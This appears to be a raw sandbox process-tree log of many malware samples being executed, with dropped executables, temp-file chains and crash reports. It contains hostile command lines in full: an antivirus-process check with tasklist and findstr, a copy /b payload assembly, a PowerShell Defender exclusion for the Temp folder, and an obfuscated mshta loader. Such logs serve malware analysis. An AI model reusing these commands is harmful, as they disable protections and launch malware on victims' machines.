C:\Users\Admin\AppData\Local\Temp\is-6E6RN.tmp\Wed07bdaa18ec852.tmp"C:\Users\Admin\AppData\Local\Temp\is-6E6RN.tmp\Wed07bdaa18ec852.tmp" /SL5="$206A4,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07bdaa18ec852.exe"3⤵PID:6176
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed07b581086d15e1327.exe1⤵PID:5916
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07b581086d15e1327.exeWed07b581086d15e1327.exe2⤵PID:3576
-
C:\Users\Admin\AppData\Local\Temp\famudit.exeC:\Users\Admin\AppData\Local\Temp\famudit.exe3⤵
- Executes dropped EXE
PID:1928
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed07dd0f9237ae5d18.exe1⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07dd0f9237ae5d18.exeWed07dd0f9237ae5d18.exe2⤵PID:6628
-
C:\Users\Admin\AppData\Local\Temp\misid.exe"C:\Users\Admin\AppData\Local\Temp\misid.exe"2⤵PID:6004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1804 -ip 18041⤵PID:6256
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed07aae78df723ca71.exe1⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07aae78df723ca71.exeWed07aae78df723ca71.exe2⤵PID:2568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed07e3ab19adb60e5fe.exe1⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07e3ab19adb60e5fe.exeWed07e3ab19adb60e5fe.exe2⤵PID:4880
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed07f6275ab2b782.exe1⤵PID:6584
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07f6275ab2b782.exeWed07f6275ab2b782.exe2⤵PID:1876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1804 -s 4721⤵
- Program crash
PID:6644
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07383feb8d.exeWed07383feb8d.exe1⤵PID:4540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 8242⤵
- Program crash
PID:1532 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 8522⤵
- Program crash
PID:6436 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 9002⤵
- Program crash
PID:7080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 9082⤵
- Program crash
PID:5400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 10402⤵
- Program crash
PID:5628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 10442⤵
- Program crash
PID:7536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 10682⤵
- Program crash
PID:5648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 15442⤵
- Program crash
PID:1688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 16282⤵
- Program crash
PID:5580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 15442⤵
- Program crash
PID:5680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 15522⤵
- Program crash
PID:6748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 15442⤵
- Program crash
PID:6836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 17762⤵
- Program crash
PID:4180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 18562⤵
- Program crash
PID:7540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 18762⤵
- Program crash
PID:5632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 18962⤵
- Program crash
PID:1692
-
C:\Windows\SysWOW64\cmd.execmd1⤵PID:6124
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"2⤵PID:5192
-
C:\Windows\SysWOW64\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
PID:1920 -
C:\Windows\SysWOW64\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
PID:7576 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe"2⤵PID:7060
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir 321442⤵PID:7984
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Edges + Inf + Foul + Entrepreneurs 32144\Town.pif2⤵PID:7976
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Admit + Like + Yu 32144\a2⤵PID:8148
-
C:\Users\Admin\AppData\Local\Temp\57941\32144\Town.pif32144\Town.pif 32144\a2⤵PID:7428
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost2⤵
- Runs ping.exe
PID:6836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6456 -ip 64561⤵PID:6044
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed22f19243a34ff2.exeWed22f19243a34ff2.exe2⤵PID:7828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 10283⤵
- Program crash
PID:3656
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed079f4562cd9c8.exeWed079f4562cd9c8.exe1⤵PID:6892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6548 -ip 65481⤵PID:7096
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed07383feb8d.exe1⤵PID:6156
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed079f4562cd9c8.exe1⤵PID:2240
-
C:\Windows\SysWOW64\cmd.execmd /k cmd < Sorry & exit1⤵PID:6532
-
C:\Users\Admin\AppData\Local\Temp\misid.exe"C:\Users\Admin\AppData\Local\Temp\misid.exe"1⤵PID:5176
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /k set1⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\{6F7A7D15-E684-4853-B17B-6C58D6B9CC03}\_isC2F6.exe"C:\Users\Admin\AppData\Local\Temp\{6F7A7D15-E684-4853-B17B-6C58D6B9CC03}\_isC2F6.exe" -IS_temp ORIGINALSETUPEXEDIR="C:\Users\Admin\Desktop\Malware" ORIGINALSETUPEXENAME="3f3c3378e66bb67a7d1c45784e1d297a086abfd7591268e65d90ad10bd12d1c7.exe"1⤵
- Executes dropped EXE
PID:6120
-
C:\Users\Admin\Desktop\Malware\5e6e5fe247e96c09a7297b32c31880847a6827762b9afdbb7d7b46e3c0071a91.exe"C:\Users\Admin\Desktop\Malware\5e6e5fe247e96c09a7297b32c31880847a6827762b9afdbb7d7b46e3c0071a91.exe"1⤵PID:5136
-
C:\Users\Admin\Desktop\Malware\5cc02305d7b5cb0675f2ac65422a115aa44d8f28e5a2b759470d17d6bf851a3a.exe"C:\Users\Admin\Desktop\Malware\5cc02305d7b5cb0675f2ac65422a115aa44d8f28e5a2b759470d17d6bf851a3a.exe"1⤵PID:5536
-
C:\Users\Admin\Desktop\Malware\3f3c3378e66bb67a7d1c45784e1d297a086abfd7591268e65d90ad10bd12d1c7.exe"C:\Users\Admin\Desktop\Malware\3f3c3378e66bb67a7d1c45784e1d297a086abfd7591268e65d90ad10bd12d1c7.exe"1⤵PID:5808
-
C:\Users\Admin\Desktop\Malware\3d52822949346df4385fc98bf246b67f2667b4959cf15e490072ba00bbff59c3.exe"C:\Users\Admin\Desktop\Malware\3d52822949346df4385fc98bf246b67f2667b4959cf15e490072ba00bbff59c3.exe"1⤵PID:5864
-
C:\Users\Admin\Desktop\Malware\3c36a35096a0e4ad330d8ae5953d844db3af5d0fa1780782a6a1adf32550fda5.exe"C:\Users\Admin\Desktop\Malware\3c36a35096a0e4ad330d8ae5953d844db3af5d0fa1780782a6a1adf32550fda5.exe"1⤵PID:5828
-
C:\Users\Admin\Desktop\Malware\3bb40bab103c5f34e08a2c179ea379abd37d9861d7f6ac3d56d5c0d693b4260a.exe"C:\Users\Admin\Desktop\Malware\3bb40bab103c5f34e08a2c179ea379abd37d9861d7f6ac3d56d5c0d693b4260a.exe"1⤵PID:3788
-
C:\Users\Admin\Desktop\Malware\6bd2d5f2630ce91d3d93d5a686d0ea381b6efa2b25d0dbd0f509a17f7ed3788d.exe"C:\Users\Admin\Desktop\Malware\6bd2d5f2630ce91d3d93d5a686d0ea381b6efa2b25d0dbd0f509a17f7ed3788d.exe"1⤵PID:7344
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\7zS4C1358C1\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C1358C1\setup_install.exe"3⤵PID:3076
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\5350ad3bc3d6e68.exe4⤵PID:6444
-
C:\Users\Admin\Desktop\Malware\6b8687e4a9ec832619d1e0477cc54e1709e25251c79571e697f6b43c4785fc29.exe"C:\Users\Admin\Desktop\Malware\6b8687e4a9ec832619d1e0477cc54e1709e25251c79571e697f6b43c4785fc29.exe"1⤵PID:6364
-
C:\Users\Admin\AppData\Local\Temp\hasfj.exe"C:\Users\Admin\AppData\Local\Temp\hasfj.exe"2⤵PID:3172
-
C:\Users\Admin\Desktop\Malware\15e3a34b2bd7ad520d87fe902eee65f35049cc5bc3579bbb5182dfb91e3fd289.exe"C:\Users\Admin\Desktop\Malware\15e3a34b2bd7ad520d87fe902eee65f35049cc5bc3579bbb5182dfb91e3fd289.exe"1⤵PID:6252
-
C:\Users\Admin\Desktop\Malware\15e3a34b2bd7ad520d87fe902eee65f35049cc5bc3579bbb5182dfb91e3fd289.exe"C:\Users\Admin\Desktop\Malware\15e3a34b2bd7ad520d87fe902eee65f35049cc5bc3579bbb5182dfb91e3fd289.exe"2⤵PID:7588
-
C:\Users\Admin\Desktop\Malware\9cf8a802217928175088777f3f886dde3cba71c0a5c427ed169e24581e1c7a9b.exe"C:\Users\Admin\Desktop\Malware\9cf8a802217928175088777f3f886dde3cba71c0a5c427ed169e24581e1c7a9b.exe"1⤵PID:7460
-
C:\Users\Admin\Desktop\Malware\8ce95aee92cffc56420902fa657bc82a44574450ada63eb864d11e404a59a078.exe"C:\Users\Admin\Desktop\Malware\8ce95aee92cffc56420902fa657bc82a44574450ada63eb864d11e404a59a078.exe"1⤵PID:1368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 3442⤵
- Program crash
PID:8036
-
C:\Users\Admin\Desktop\Malware\9d0863c76aa5212eee67a9d8e8fa25547d9c99e9c47286027637fb50812a1110.exe"C:\Users\Admin\Desktop\Malware\9d0863c76aa5212eee67a9d8e8fa25547d9c99e9c47286027637fb50812a1110.exe"1⤵PID:7668
-
C:\Users\Admin\AppData\Local\Temp\7D1E.tmp"C:\Users\Admin\AppData\Local\Temp\7D1E.tmp"2⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\8665.tmp"C:\Users\Admin\AppData\Local\Temp\8665.tmp"3⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\8CAF.tmp"C:\Users\Admin\AppData\Local\Temp\8CAF.tmp"4⤵PID:5712
-
C:\Users\Admin\AppData\Local\Temp\928B.tmp"C:\Users\Admin\AppData\Local\Temp\928B.tmp"5⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\96E0.tmp"C:\Users\Admin\AppData\Local\Temp\96E0.tmp"6⤵PID:6108
-
C:\Users\Admin\AppData\Local\Temp\9B74.tmp"C:\Users\Admin\AppData\Local\Temp\9B74.tmp"7⤵PID:6844
-
C:\Users\Admin\AppData\Local\Temp\A0F2.tmp"C:\Users\Admin\AppData\Local\Temp\A0F2.tmp"8⤵PID:2692
-
C:\Users\Admin\AppData\Local\Temp\A567.tmp"C:\Users\Admin\AppData\Local\Temp\A567.tmp"9⤵PID:8100
-
C:\Users\Admin\AppData\Local\Temp\A98D.tmp"C:\Users\Admin\AppData\Local\Temp\A98D.tmp"10⤵PID:3520
-
C:\Users\Admin\Desktop\Malware\9f9bbdf52e05dd9de10f36aac171224ddded63a05a2e0bbae484353bef4924cb.exe"C:\Users\Admin\Desktop\Malware\9f9bbdf52e05dd9de10f36aac171224ddded63a05a2e0bbae484353bef4924cb.exe"1⤵PID:5448
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵PID:6600
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵PID:6256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 20523⤵
- Program crash
PID:5028
-
C:\Users\Admin\Desktop\Malware\8b70ca880f25f4e03bcac422fb2e6044369bf25d45d9b846db546728d66618a6.exe"C:\Users\Admin\Desktop\Malware\8b70ca880f25f4e03bcac422fb2e6044369bf25d45d9b846db546728d66618a6.exe"1⤵PID:6332
-
C:\Users\Admin\Desktop\Malware\10f4e5b89953a29f22a64373ec33b585af9b406a18710fec96d3adab993cbcc4.exe"C:\Users\Admin\Desktop\Malware\10f4e5b89953a29f22a64373ec33b585af9b406a18710fec96d3adab993cbcc4.exe"1⤵PID:2180
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵PID:7364
-
C:\Users\Admin\Desktop\Malware\6c48e39183dda2dbdc8c92592c72feef6c6688c7b9e033ffe55581be572858e5.exe"C:\Users\Admin\Desktop\Malware\6c48e39183dda2dbdc8c92592c72feef6c6688c7b9e033ffe55581be572858e5.exe"1⤵PID:2584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4540 -ip 45401⤵PID:3152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4540 -ip 45401⤵PID:7296
-
C:\Users\Admin\AppData\Local\Temp\5350ad3bc3d6e68.exeC:\Users\Admin\AppData\Local\Temp\5350ad3bc3d6e68.exe1⤵PID:7156
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\setup_install.exe"2⤵PID:7532
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon10ef626df85c57.exe3⤵PID:2964
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon10ef626df85c57.exeMon10ef626df85c57.exe4⤵PID:5188
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon10ec395ae192.exe3⤵PID:4248
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon10ec395ae192.exeMon10ec395ae192.exe4⤵PID:7632
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon10716eec3c629f745.exe3⤵PID:2744
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon10716eec3c629f745.exeMon10716eec3c629f745.exe4⤵PID:1460
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon10c1a120fed696e5.exe3⤵PID:6756
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon10c1a120fed696e5.exeMon10c1a120fed696e5.exe4⤵PID:4276
-
C:\Users\Admin\AppData\Local\Temp\is-AKUDL.tmp\Mon10c1a120fed696e5.tmp"C:\Users\Admin\AppData\Local\Temp\is-AKUDL.tmp\Mon10c1a120fed696e5.tmp" /SL5="$90230,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon10c1a120fed696e5.exe"5⤵PID:7676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1064e3e790b.exe3⤵PID:3824
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon1064e3e790b.exeMon1064e3e790b.exe4⤵PID:5884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 8245⤵
- Program crash
PID:2240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 8445⤵
- Program crash
PID:2952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 8445⤵
- Program crash
PID:7692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 8925⤵
- Program crash
PID:1532 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 10405⤵
- Program crash
PID:4456 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 10965⤵
- Program crash
PID:5936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 15485⤵
- Program crash
PID:5300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 15565⤵
- Program crash
PID:5980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 16045⤵
- Program crash
PID:7608 -
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed22d1525a0017.exeWed22d1525a0017.exe6⤵PID:1628
-
C:\Users\Admin\AppData\Local\Temp\is-N8690.tmp\Wed22d1525a0017.tmp"C:\Users\Admin\AppData\Local\Temp\is-N8690.tmp\Wed22d1525a0017.tmp" /SL5="$107BE,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed22d1525a0017.exe"7⤵PID:4420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 16085⤵
- Program crash
PID:4544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 17885⤵
- Program crash
PID:3448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 16525⤵
- Program crash
PID:5164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 10285⤵
- Program crash
PID:1416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon10d95ada86e6c1786.exe3⤵PID:7664
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon10d95ada86e6c1786.exeMon10d95ada86e6c1786.exe4⤵PID:5252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 5803⤵
- Program crash
PID:7508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon107ce740ef0.exe3⤵PID:5940
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon107ce740ef0.exeMon107ce740ef0.exe4⤵PID:3552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 3445⤵
- Program crash
PID:8044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon10509f710deaa1c.exe3⤵PID:7800
-
C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\Mon10509f710deaa1c.exeMon10509f710deaa1c.exe4⤵PID:6516
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵PID:5412
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:4544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4540 -ip 45401⤵PID:368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1368 -ip 13681⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\AD37.tmp"C:\Users\Admin\AppData\Local\Temp\AD37.tmp"1⤵PID:4980
-
C:\Users\Admin\AppData\Local\Temp\B1BB.tmp"C:\Users\Admin\AppData\Local\Temp\B1BB.tmp"2⤵PID:7544
-
C:\Users\Admin\AppData\Local\Temp\B5F1.tmp"C:\Users\Admin\AppData\Local\Temp\B5F1.tmp"3⤵PID:7600
-
C:\Users\Admin\AppData\Local\Temp\BB41.tmp"C:\Users\Admin\AppData\Local\Temp\BB41.tmp"4⤵PID:7464
-
C:\Users\Admin\AppData\Local\Temp\C16B.tmp"C:\Users\Admin\AppData\Local\Temp\C16B.tmp"5⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\C41A.tmp"C:\Users\Admin\AppData\Local\Temp\C41A.tmp"6⤵PID:1688
-
C:\Users\Admin\AppData\Local\Temp\C8AE.tmp"C:\Users\Admin\AppData\Local\Temp\C8AE.tmp"7⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\CF07.tmp"C:\Users\Admin\AppData\Local\Temp\CF07.tmp"8⤵PID:7772
-
C:\Users\Admin\AppData\Local\Temp\D8BC.tmp"C:\Users\Admin\AppData\Local\Temp\D8BC.tmp"9⤵PID:8100
-
C:\Users\Admin\AppData\Local\Temp\E241.tmp"C:\Users\Admin\AppData\Local\Temp\E241.tmp"10⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\E87B.tmp"C:\Users\Admin\AppData\Local\Temp\E87B.tmp"11⤵PID:7540
-
C:\Users\Admin\AppData\Local\Temp\ED7C.tmp"C:\Users\Admin\AppData\Local\Temp\ED7C.tmp"12⤵PID:1612
-
C:\Users\Admin\AppData\Local\Temp\F51D.tmp"C:\Users\Admin\AppData\Local\Temp\F51D.tmp"13⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\FCBE.tmp"C:\Users\Admin\AppData\Local\Temp\FCBE.tmp"14⤵PID:6420
-
C:\Users\Admin\AppData\Local\Temp\385.tmp"C:\Users\Admin\AppData\Local\Temp\385.tmp"15⤵PID:2284
-
C:\Users\Admin\AppData\Local\Temp\980.tmp"C:\Users\Admin\AppData\Local\Temp\980.tmp"16⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\EDF.tmp"C:\Users\Admin\AppData\Local\Temp\EDF.tmp"17⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\14CB.tmp"C:\Users\Admin\AppData\Local\Temp\14CB.tmp"18⤵PID:6988
-
C:\Users\Admin\AppData\Local\Temp\198D.tmp"C:\Users\Admin\AppData\Local\Temp\198D.tmp"19⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\1D46.tmp"C:\Users\Admin\AppData\Local\Temp\1D46.tmp"20⤵PID:5984
-
C:\Users\Admin\AppData\Local\Temp\1FC7.tmp"C:\Users\Admin\AppData\Local\Temp\1FC7.tmp"21⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\2238.tmp"C:\Users\Admin\AppData\Local\Temp\2238.tmp"22⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\243C.tmp"C:\Users\Admin\AppData\Local\Temp\243C.tmp"23⤵PID:7384
-
C:\Users\Admin\AppData\Local\Temp\2778.tmp"C:\Users\Admin\AppData\Local\Temp\2778.tmp"24⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\29BA.tmp"C:\Users\Admin\AppData\Local\Temp\29BA.tmp"25⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\2BDD.tmp"C:\Users\Admin\AppData\Local\Temp\2BDD.tmp"26⤵PID:7712
-
C:\Users\Admin\AppData\Local\Temp\2CC7.tmp"C:\Users\Admin\AppData\Local\Temp\2CC7.tmp"27⤵PID:6712
-
C:\Users\Admin\AppData\Local\Temp\31D8.tmp"C:\Users\Admin\AppData\Local\Temp\31D8.tmp"28⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\338E.tmp"C:\Users\Admin\AppData\Local\Temp\338E.tmp"29⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\3497.tmp"C:\Users\Admin\AppData\Local\Temp\3497.tmp"30⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\35A1.tmp"C:\Users\Admin\AppData\Local\Temp\35A1.tmp"31⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\3737.tmp"C:\Users\Admin\AppData\Local\Temp\3737.tmp"32⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\3841.tmp"C:\Users\Admin\AppData\Local\Temp\3841.tmp"33⤵PID:7856
-
C:\Users\Admin\AppData\Local\Temp\3979.tmp"C:\Users\Admin\AppData\Local\Temp\3979.tmp"34⤵PID:7236
-
C:\Users\Admin\AppData\Local\Temp\3B00.tmp"C:\Users\Admin\AppData\Local\Temp\3B00.tmp"35⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\3C29.tmp"C:\Users\Admin\AppData\Local\Temp\3C29.tmp"36⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\3D23.tmp"C:\Users\Admin\AppData\Local\Temp\3D23.tmp"37⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\3E1D.tmp"C:\Users\Admin\AppData\Local\Temp\3E1D.tmp"38⤵PID:844
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed223a477901b3292.exeWed223a477901b3292.exe21⤵PID:5624
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\KiffApp2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\KiffApp2.exe"22⤵PID:844
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\sfx_123_400.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\sfx_123_400.exe"22⤵PID:7472
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIpt: ClOSe ( CreateObjECT ("wScRipT.shELL" ).RUN( "cMd.Exe /C COpY /Y ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\sfx_123_400.exe"" RXaoSBVaB48N.EXE && STArt rXAOSBVaB48N.eXe -pxPQlPgRn5on8guKmOCBOu43B3pp & IF """" == """" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\sfx_123_400.exe"") do taskkill -f /iM ""%~NxU"" " , 0, true ) )23⤵PID:8136
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C COpY /Y "C:\Users\Admin\AppData\Local\Temp\RarSFX1\sfx_123_400.exe" RXaoSBVaB48N.EXE &&STArt rXAOSBVaB48N.eXe -pxPQlPgRn5on8guKmOCBOu43B3pp &IF ""== "" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX1\sfx_123_400.exe") do taskkill -f /iM "%~NxU"24⤵PID:8168
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /iM "sfx_123_400.exe"25⤵
- Kills process with taskkill
PID:5692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4540 -ip 45401⤵PID:8084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7532 -ip 75321⤵PID:4356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6256 -ip 62561⤵PID:8040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4540 -ip 45401⤵PID:8120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4540 -ip 45401⤵PID:6184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4708 -ip 47081⤵PID:5156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4540 -ip 45401⤵PID:6096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4540 -ip 45401⤵PID:5788
-
